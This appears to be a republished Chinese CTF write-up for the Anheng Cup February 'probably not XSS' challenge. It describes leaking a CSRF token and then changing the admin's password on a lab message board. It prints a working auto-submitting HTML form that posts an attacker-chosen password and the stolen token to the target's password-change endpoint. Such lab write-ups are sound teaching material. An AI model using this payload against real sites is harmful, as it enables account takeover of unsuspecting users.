安恒杯2月月赛-应该不是xss

Posted hell0_w

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了安恒杯2月月赛-应该不是xss相关的知识,希望对你有一定的参考价值。

 

 

 

1. 打开题目一看,是个留言板

 

 2. 查看源码发现有几个js文件

依次打开发现在main.js里存在这样一段代码

3. 访问 /#login是登录的界面,/#chgpass是修改密码的界面,其中修改密码的时候不需要输入原密码,大概其是个csrf

4. 再查看app.js,是个修改密码的js,但是会先验证token,所以我们需要先得到token

获取token的方法原理:https://githubengineering.com/githubs-post-csp-journey/

5. 利用:

6. 监听得到token

 

7. 下一步就是构造链接,让管理员修改为我们想要的密码

在自己的服务器放置一个修改密码的页面,代码如下

<form action="http://192.168.5.94/api.php?action=chgpass" method="POST" name="chpa">
<input type="text" name="password" value="hell0_w" />
<input type="text" name="password2" value="hell0_w" />
<input type="text" name="token" value="ymYV0QvnvPbYGfUsmfmOI8Qz4wXaSQU6" />
</form>
<script>document.forms[\'chpa\'].submit();</script>

 

收到请求

 

 

 使用我们修改的密码登录,就可以看到我们想要的flag了

 

 

以上是关于安恒杯2月月赛-应该不是xss的主要内容,如果未能解决你的问题,请参考以下文章

栈上的 partial overwrite

安恒杯-绕过看门狗

安恒杯月赛babybypass 不用英文数字getshell

4.29安恒杯writeup

安恒杯月赛 babypass getshell不用英文字母和数字

安恒杯-一张谍报